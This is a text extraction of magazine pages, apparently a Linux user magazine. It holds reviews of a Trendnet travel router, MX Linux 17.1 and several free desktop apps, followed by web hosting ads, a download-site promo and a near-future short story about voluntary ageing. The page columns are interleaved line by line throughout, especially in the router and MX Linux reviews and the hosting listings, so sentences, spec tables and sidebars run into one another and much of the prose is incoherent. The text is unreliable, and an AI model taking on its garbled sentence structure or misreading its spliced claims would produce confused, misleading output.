www.trendnet.com functionality of an AC750 wireless router in a short range, the 5GHz spectrum is superior, but both
Specs pocket-sized enclosure. On the front is a single it and 2.4GHz are strong within a series of adjoining
Standards IEEE 802.3/u Ethernet port with mode selector, and on the right rooms. The quickest speeds you can get from
802.11a/b/g/n/ac is a WPS button and reset switch. Trendnet also any source through Ethernet are in the 8-10MB/s
Modes Router, repeater, includes power adaptor pins for the the UK, US and range, as dictated by the 10/100Mbit downlink port.
WISP Europe, although there’s no pouch to hold them. Ironically, if one user is connected wirelessly via
Hardware interfaces You can use the device in two basic ways. 2.4GHz and the other at 5GHz, it’s possible to get
10/100 Mbps port, router/ The first is as a wireless access point; the Wi-Fi 25MB/s between devices.
AP-WISP/off switch, connectivity on offer is basic but serviceable on In terms of security, the Trendnet offers the ability
WPS button, reset both 2.4GHz and 5GHz bands. The second mode, to tier users using guest access, multiple SIDs
button, LED indicators, mostly of interest to those in the US, is AP-WISP and parental controls. There is also PPTP/L2TP/
interchangeable power plugs: for connecting to a Wireless Internet Service IPsec VPN pass-through, Virtual Server and DMZ
US, EU, UK Provider. The only caveat is that the hardware isn’t definitions, plus QoS. Although not suggested by the
Features IPv6, dual band compatible with captive portal wireless login pages. documentation it supports WEP, WPA, WPA2 and
connectivity, multiple The WISP mode also doubles as a standard access critically WPA2-Enterprise.
SSID, multicast to unicast point and repeater, so you can use it to extend an The TEW-817DTR does pretty much what Trendnet
converter, WDS and VPN existing wired or wireless network. claims. It’s a flexible and affordable solution that can
passthrough support Most users are looking for a Wi-Fi service that help you remain connected away from the office.
Size 58x47x89 mm works in a single hotel room or room cluster, so we Mark Pickavance

www.linuxuser.co.uk 87
Review MX Linux 17.1

Above Being desktop-orientated, MX


Linux includes a bunch of non-free
software that you can list with the
vrms command

Distro

MX Linux 17.1
A joint effort of two popular projects, this elegant
distribution is steadily gaining in popularity
The MX Linux project is a joint effort between the the disk automatically if you want MX Linux to take
antiX and MEPIS communities, and the distribution over the entire disk; dual-booters and advanced
they produce uses some modified components users will have to use Gparted to manually partition
Specs from both projects. MX Linux is also popular for its the disk. Advanced users will appreciate the option
CPU i686 Intel or AMD stance of sticking with sysvinit instead of switching to control the services that start during boot, while
processor over to systemd. new users can press ahead with the defaults. If
Graphics Video adaptor and The distribution uses a customised Xfce for a you’ve made any modifications to the desktop in the
monitor with 1,024x768 dapper-looking desktop that performs adequately Live environment, you can ask the installer to carry
or higher resolution even on older hardware. MX Linux ships as a Live these over to the installation, which is a nice touch.
RAM 512MB environment and uses a custom installer verbose The desktop boots to a welcome screen that
Storage 5GB enough to explain what’s going on with the various contains useful links to common tweaks and the
License GPL and various steps. The installer also uses reasonable defaults distribution’s set of custom tools. The installation
Available from that’ll help first-timers sail through the installation. also includes a detailed 172-page user’s manual and
https://mxlinux.org The partitioning screen offers the option to partition you can access other avenues of help and support,

88
Above MX Linux very responsibly notifies users when a program is started with root permission without it prompting the user

Pros
Advanced users will appreciate the option to control the The custom package
manager with its list of
services that start during boot, while new users can press curated packages and
custom MX Tools.
ahead with the defaults
including forums and videos, on the project’s that will only install available updates. In the latest Cons
website. The clean, iconless desktop displays basic 17.1 release, the update utility has new options to The hassle of backing up
system information via an attractive Conky display. enable unattended installations using either of data and a fresh install
Also by default, the Xfce panel is pinned to the left these mechanisms. whenever MX switches to
side of the screen and uses the Whisker menu. The update utility is part of the distribution’s set a new Debian Stable.
MX Linux’s default collection of apps doesn’t of custom tools designed to help users manage their
disappoint, as it includes everything to fulfill the installation. These are housed under the MX Tools
requirements of a typical desktop user. In addition dashboard and cover a wide range of functionality, Summary
to a host of Xfce apps and utilities, there’s Firefox, including a boot-repair tool, a codecs downloader, a MX Linux is a
Thunderbird, LibreOffice, GIMP, VLC, luckyBackup, utility to manipulate Conky, a Live USB creator, and a wonderfully built
and more. MX is built on the current Debian Stable snapshot tool for making bootable ISO images of the distribution that
release but updates a lot of apps and back-ports working installation. scores well for looks
newer versions from Debian Testing. The only One of the tools you’ll be using quite often is and performance. The
downside of this arrangement is that you’ll have to the MX Package Installer, which has undergone highlight is its custom
do a fresh install of MX Linux when the distribution a major rewrite in the 17.1 release. The installer tools that make regular
switches to a new Debian Stable release. includes popular applications from the Debian admin tasks a breeze.
An icon in the status bar announces available Stable repositories along with packages from Debian The package manager,
updates; you can click it to open the update utility, Testing. It also lists curated packages that aren’t and the remastering
which works in two modes. The default is the full in either repositories but which have been pulled and snapshot
upgrade mode, which is the equivalent of dist-
upgrade and will update packages and resolve
dependencies even if its requires adding or removing
from the official developers’ websites or other
repositories, and have been configured to work
seamlessly with MX Linux.
tools also deserve
a mention. 9
new packages. There’s also a basic upgrade mode Mayank Sharma

www.linuxuser.co.uk 89
Review Fresh free & open source software

Desktop search

Searchmonkey JAVA 3.2.0


Get the power of CLI search tools in a graphical version
Most file managers have a find function
to help you search for files. But these
lack powerful filtering mechanisms such
as regular expressions that are usually
only available on the command line. Searchmonkey
JAVA is a graphical tool that bridges the gap between
the basic functions of file managers and powerful
CLI tools by bringing a feature-rich regular-
expression builder to the desktop.
You can use Searchmonkey to easily construct a
complex search query with little effort. It can help
you search for files by their size, type, creation,
modification and last-accessed date. You can also
search for files recursively, and the app enables you
to control how many subfolders it should look into.
The Option tab houses other advanced search
options such as the option to skip binary files and
limit the number of files in the results. When you’ve Above Developers can use the application to quickly scan and highlight expressions inside a
built your query, you can use the Test Expression bunch of source code files, for example
option before unleashing it on your file system.
Searchmonkey JAVA requires Java JRE 1.8 or
above (there are versions for GNOME and KDE too), Pros Cons Great for...
and you can use the app without installation. Head Helps desktop users The interface might seem Building complex search
to the Download section on its website, grab the JAR create complex and a little daunting, and as a queries from the desktop.
file that includes all the dependencies, and then run powerful search queries Java app it sticks out like http://searchmonkey.
it with the java -jar command. with little time and effort. a sore thumb. embeddediq.com

Media manager

beets 1.4.6 Pros


Enables you to easily sort
and catalogue your entire
Organise your media library from the command line music collection with a
single command, including
Keyboard warriors who love the the online MusicBrainz database. Once the files cover art and lyrics.
command line can now even beat have been imported, you can query the collection
their media library into shape with using beets’ own commands. For example, beet ls
beets. In addition to managing music -a year:1983..1985 lists all your albums released Cons
libraries, beets can fix the filenames and metadata between 1983 and 1985. Requires a configuration
of your music collection, fetch cover art and lyrics, beets also has a simple web UI. To use the web file to do its magic that
transcode audio to different formats, and do a lot interface you need the Flask framework, which you needs to be crafted
more. While Beets is available in the repositories of can install with pip install flask. You can then manually, which will take a
popular distributions, you should install the latest enable the web interface in the configuration file little time.
version using Python’s pip package manager using before heading to http://localhost:8337 to display
pip install beets. You’ll need to spend some time it. From here you can search through your imported
creating a configuration file for the utility. music collection. Great for...
Once created, beets will import your music Click a song from the results to view its metadata, Sorting a large collection
files and sort them as per the instructions in the including the lyrics if you’ve enabled the plug-in of music files with relative
configuration file. During import, the utility also fixes and fetched them. The web interface also has basic ease from the CLI.
and fills in any gaps in the metadata by referencing controls to play and pause music. http://beets.io

90
Programming Language

Gambas 3.11.0 Pros


Simplifies the building of
graphical apps for Linux
A convenient way to build graphical apps for Linux using the Qt4 or GTK+
toolkits and a designer.
Gambas, which is a recursive acronym more. You can use it to write network apps and
for Gambas Almost Means Basic, is for SDL, XML and OpenGL programming. Gambas
an object-orientated dialect of the can also be used as a scripting language. The Cons
Basic programming language. Gambas’ Gambas IDE exposes all the useful functions of Some people dislike it for
purpose is to mimic Visual Basic’s ease of use of the underlying programming language. Besides its its Visual Basic lineage,
while introducing improved functionality. If you’re graphical toolkits, Gambas works with databases while others count this as
familiar with VB, you can get started with Gambas such as MySQL, SQLite and PostgreSQL. You can a strength.
without much trouble, although the two aren’t even use the IDE to create installation packages for
source-code compatible. Gambas makes it very easy many distributions including Arch, Debian, Fedora,
to build graphical apps on Linux using the Qt4 or the Ubuntu and Slackware. Great for...
GTK+ toolkits, and also includes a GUI designer to Gambas is available in the official repositories Building a graphical
help ease the process. In fact, Gambas includes of all popular distributions. The latest release is user interface for apps
an IDE written in Gambas itself. a minor feature release with fixes and tweaks to using Visual Basic-
Gambas is a true object-orientated language various components including the code editor, the like syntax.
with objects and classes, methods, constants, database editor, the debugging panel, the form http://gambas.
polymorphism, constructors and destructors, and editor, the packager wizard and more. sourceforge.net

Screencast recorder

SimpleScreenRecorder 0.3.10
Record and share desktop screencasts with ease
This app’s name is actually something
of a misnomer. It’s flush with features
and tweakable parameters, and gives
its users a good amount of control over
the screencast. SSR can record the entire screen
and also enables you to select and record particular
windows and regions on the desktop.
It uses a wizard-like interface and each step of the
process has several options. All these have helpful
tooltips that do a wonderful job of explaining their
purpose. In addition to selecting the dimensions of
the screen recording, you can also scale the video
and alter its frame rate.
The next screen offers several options for
selecting the container and audio and video codecs
for the recording, as well as a few associated
settings. SSR supports all the container formats that
are supported by the FFmpeg and libav libraries, Above If you want, you can pass additional options via CLI parameters and save them as custom
including MKV, MP4, WebM, OGG as well as a host profiles for later use
of others such as 3GP, AVI and MOV. You can also
choose codecs for the audio and video stream
separately, and preview the recording area before Pros Cons Great for...
you start capturing it. A well-documented Lacks some options Making quick screencasts
While it’s recording, the application enables you to interface that’s easy to use offered by its peers, such in all popular formats.
keep an eye on various recording parameters, such but still manages to pack as the ability to record a http://www.maartenbaert.
as the size of the captured video. in a lot of parameters. webcam with the desktop. be/simplescreenrecorder

www.linuxuser.co.uk 91
Get your listing in our directory
Web Hosting To advertise here, contact Chris
[email protected] | +44 01225 68 7832 (ext. 7832)

recommended

Hosting listings
Featured host: Netcetera is one of
www.netcetera.co.uk Europe’s leading Web
03330 439780 Hosting service providers,
with customers in over 75
countries worldwide
About us
Formed in 1996, Netcetera is one of IT infrastructure provider offering
Europe’s leading web hosting service co-location, dedicated servers and
providers, with customers in over 75 managed infrastructure services to
countries worldwide. It is a leading businesses worldwide.

What we offer
• Managed Hosting • Cloud Hosting
A full range of solutions for a cost- Linux, Windows, hybrid and private
effective, reliable, secure host cloud solutions with support and
• Dedicated Servers scaleability features
Single server through to a full racks • Datacentre co-location from quad-
with FREE setup and a generous core up to smart servers, with quick
bandwidth allowance setup and full customisation

Five tips from the pros Testimonials


01 Optimise your website images
When uploading your website
to the internet, make sure all of your
your host offers you a backup solution,
it’s important to take responsibility for
your own data and protect it.
David Brewer
“I bought an SSL certificate. Purchasing is painless, and
only takes a few minutes. My difficulty is installing the
images are optimised for the web. Try certificate, which is something I can never do. However,
using jpegmini.com software; or if using
WordPress, install the EWWW Image
Optimizer plugin.
04 Trying to rank on Google?
Google made some changes
in 2015. If you’re struggling to rank on
I simply raise a trouble ticket and the support team are
quickly on the case. Within ten minutes I hear from the
certificate signing authority, and approve. The support
Google, make sure that your website team then installed the certificate for me.”

02 Host your website in the UK


Make sure your website is hosted
in the UK, and not just for legal reasons.
is mobile-responsive. Plus, Google
now prefers secure (HTTPS) websites.
Contact your host to set up and force
Tracy Hops
“We have several servers from Netcetera and the
If your server is located overseas, you HTTPS on your website. network connectivity is top-notch – great uptime and
may be missing out on search engine speed is never an issue. Tech support is knowledge and
rankings on google.co.uk – you can
check where your site is based on
www.check-host.net.
05 Avoid cheap hosting
We’re sure you’ve seen those TV
adverts for domain and hosting for £1!
quick in replying – which is a bonus. We would highly
recommend Netcetera. ”

Think about the logic… for £1, how many J Edwards

03 Do you make regular backups?


How would it affect your business
if you lost your website today? It’s vital to
clients will be jam-packed onto that
server? Surely they would use cheap £20
drives rather than £1k+ enterprise SSDs?
“After trying out lots of other hosting companies, you
seem to have the best customer service by a long way,
and all the features I need. Shared hosting is very fast,
always make your own backups; even if Remember: you do get what you pay for. and the control panel is comprehensive…”

92
SSD web hosting
Supreme hosting

www.bargainhost.co.uk
www.cwcs.co.uk 0843 289 2681
0800 1 777 000
Since 2001, Bargain Host has
CWCS Managed Hosting is the UK’s campaigned to offer the lowest-priced
leading hosting specialist. It offers a possible hosting in the UK. It has
fully comprehensive range of hosting achieved this goal successfully and
products, services and support. Its built up a large client database which
highly trained staff are not only hosting includes many repeat customers. It has
experts, it’s also committed to delivering also won several awards for providing an
a great customer experience and is outstanding hosting service.
passionate about what it does.
• Shared hosting
• Colocation hosting • Cloud servers
• VPS
• 100% Network uptime Enterprise • Domain names

hosting: Value Linux hosting


Value hosting www.2020media.com | 0800 035 6364
WordPress comes pre-installed We are known for our
for new users or with free “Knowledgeable and
managed migration. The excellent service” and we
patchman-hosting.co.uk
elastichosts.co.uk 01642 424 237
managed WordPress service serve agencies, designers,
02071 838250 is completely free for the developers and small
first year. businesses across the UK. Linux hosting is a great solution for
home users, business users and web
ElasticHosts offers simple, flexible and
designers looking for cost-effective
cost-effective cloud services with high
and powerful hosting. Whether you
performance, availability and scalability
are building a single-page portfolio,
for businesses worldwide. Its team
or you are running a database-driven
of engineers provide excellent support
ecommerce website, there is a Linux
around the clock over the phone, email
hosting solution for you.
and ticketing system.
• Student hosting deals
• Cloud servers on any OS
• Site designer
• Linux OS containers
• Domain names
• World-class 24/7 support

Budget Fast, reliable hosting


Small business host
hosting:
www.hetzner.de/us | +49 (0)9831 5050 www.bytemark.co.uk
www.hostpapa.co.uk 01904 890 890
0800 051 7126 Hetzner Online is a professional pricing and flexible support
web hosting provider and and services has enabled Founded in 2002, Bytemark are “the UK
HostPapa is an award-winning web hosting experienced data-centre Hetzner Online to continuously experts in cloud & dedicated hosting”.
service and a leader in green hosting. It operator. Since 1997 the strengthen its market Its manifesto includes in-house
offers one of the most fully featured hosting company has provided private position both nationally expertise, transparent pricing, free
packages on the market, along with 24/7 and business clients with and internationally. software support, keeping promises
customer support, learning resources and high-performance hosting made by support staff and top-quality
outstanding reliability. products, as well as the • Dedicated and shared hosting hosting hardware at fair prices.
necessary infrastructure • Colocation racks
• Website builder for the efficient operation of • Internet domains and • Managed hosting
• Budget prices websites. A combination of SSL certificates • UK cloud hosting
• Unlimited databases stable technology, attractive • Storage boxes • Linux hosting

www.linuxuser.co.uk 93
Free Resources
Welcome to Filesilo!
Download the best distros, essential FOSS and all
our tutorial project files from your FileSilo account
what is it?
Every time you
see this symbol
in the magazine,
there is free
online content
that's waiting
to be unlocked
on FileSilo.

why register?
• Secure and safe 1. unlock your content 2. enjoy the resources
online access,
from anywhere Go to www.filesilo.co.uk/linuxuser and follow the You can access FileSilo on any computer, tablet or
instructions on screen to create an account with our smartphone device using any popular browser. However,
• Free access for secure FileSilo system. When your issue arrives or you we recommend that you use a computer to download
every reader, print download your digital edition, log into your account and content, as you may not be able to download files to other
and digital unlock individual issues by answering a simple question devices. If you have any problems with accessing content
based on the pages of the magazine for instant access to on FileSilo, take a look at the FAQs online or email our
• Download only the extras. Simple! team at [email protected].
the files you want,
when you want

• All your gifts, Free


from all your
issues, all in for digital
one place
readers too!
Read on your tablet,
download on your
computer

94
Log in to www.filesilo.co.uk/linuxuser

Subscribe and get instant access


Get access to our entire library of resources with a money-
saving subscription to the magazine – subscribe today!

This month find...


distros
It’s Ubuntu time! Sample the popular
official flavour, Ubuntu MATE 18.04
LTS (beta 2). Fancy something a little
different? Take middleweight distro MX
Linux 17.1 for a spin and if you can’t stand Subscribe
systemd grab Devuan 2.0 ASCII (beta).
& save!
software See all the details on
how to subscribe on
Grab our privilege escalation bundle
for Computer Security tutorial, which page 30
includes Lynis security auditing tool and
the Vulners scanner.

tutorial code
Get into the container business with our
example scripts, Dockerfiles, Ansible
playbook samples and Puppet manifests.
NEXT ISSUE ON SALE 3 May
Short story Stephen Oram Master the Cloud | Unsolvable computing problems | Nextcloud for biz

Facebook: Twitter:
follow us facebook.com/LinuxUserUK @linuxusermag

near-future fiction

Happy Forever Day


U
ncle Bill is the first to arrive. Every year we have this conversation – since she
With the endless energy of a sixteen-year- turned fifty-three and overtook me. As time goes by,
old, he bursts into the room. “Party!” it’s become easier and easier to think of her as my
he screams. grandmother rather than the granddaughter she really
I wish he wouldn’t. It’s hard enough to celebrate your is. And every year she respects me less.
fifty-third birthday, every single year, without having Uncle Bill bounds across the room and slaps me on
the added weight of trying to ignore the enthusiasm the back. “Forever is a long time,” he says. “It’s a really
of your younger older uncle – I still haven’t worked out long time, so let’s enjoy.”
about what to call my ancestors who chose to stop ageing at He glances down at Joanna and opens his mouth to
Stephen Oram a younger age than I did. speak, but stops himself. There’s never been a good
Stephen writes He’s never going to grow up, and any experience he conversation between them. They are definitely not the
near-future gains won’t turn into wisdom because of the strange sort of opposites that attract.
science fiction. effects of renewing brain cells. But knowing he’s He hovers, balancing on one foot and then the other,
He’s been a never going to change doesn’t make him any easier his eyes pretending to scan the room.
hippie-punk, to be around. Joanna stands up. It’s painful to watch her body
religious-squatter Next is Joanna, my ninety-five-year-old coping with old age. It’s why most people avoid her.
and a bureaucrat- granddaughter. “Grandpa,” she says, giving me a That, and the fact that she plays the cantankerous old
anarchist; beautifully-wrapped present. “Happy Forever Day.” woman a little too well. Thankfully, she’s fairly straight
he thrives on “It’s about time you chose yours,” I reply. “You can’t with me.
contradictions. put it off for ever.” “I’ll leave you young ’uns to it,” she says and raises
He has two She lowers herself carefully on to the nearest chair. her glass. “Happy Forever Day.”
published “I know, I know. Well, I can put it off for as long as I live. Uncle Bill leans in close. “It’s not right, is it?”
novels, Quantum Pass me a gin.” he whispers.
Confessions I pour her a strong gin and tonic, just the way she “What?” I ask.
and Fluence, “Her. That great-great-niece of mine. She
and is in several shouldn’t keep ageing. We’ll have to pay for
anthologies. His As time goes by, it’s become her medical bills. It’s so embarrassing, having
recent collection, an Ancient. Not to mention the shame of a
Eating Robots easier and easier to think of her funeral, if she lets it get that far.”
and Other Stories, He’s got a point, but it’s a clumsy way of
was described by as my grandmother rather than expressing it. Immature. I like to think I hold
the Morning Star my head up high and support everyone’s
as one of the top the granddaughter she really is choice, no matter what they choose. But he’s
radical works of right. I don’t. None of us do.
fiction in 2017. He takes a small round container from his
likes it, and wait for the alcohol to work its way into jacket pocket.
her blood before returning to the perennial topic. Her It can’t be. Can it? He wouldn’t. Would he?
Forever Day. He sees me looking and winks. “The clinic,” he says.
“It’s not really fair on the rest of us, is it, my darling?” “Sometimes you have to take control.”
“Oh, for goodness’ sake, stop it. Think of all the “No…” But he’s gone, weaving between the guests,
knowledge I retain and the wisdom I’m accumulating. heading towards Joanna.
Why would I ever choose to lose that?” I can’t quite make it out, but I’m sure he slips
“Err… because you’re a health burden.” something from his container into her gin as he
“I’m not that decrepit you know. Quit fussing.” passes by.
“Joanna, why won’t you choose?” She lifts her glass from the table, swallows the last
“I would have stopped when menstruation ended mouthful and begins to sway.
and contraception became a thing of the past, but I like As she faints, Uncle Bill steps forward, grabs her
getting older. It makes me feel alive.” under the armpits and helps her outside.

96
The source for tech buying advice
techradar.com
9000

You might also like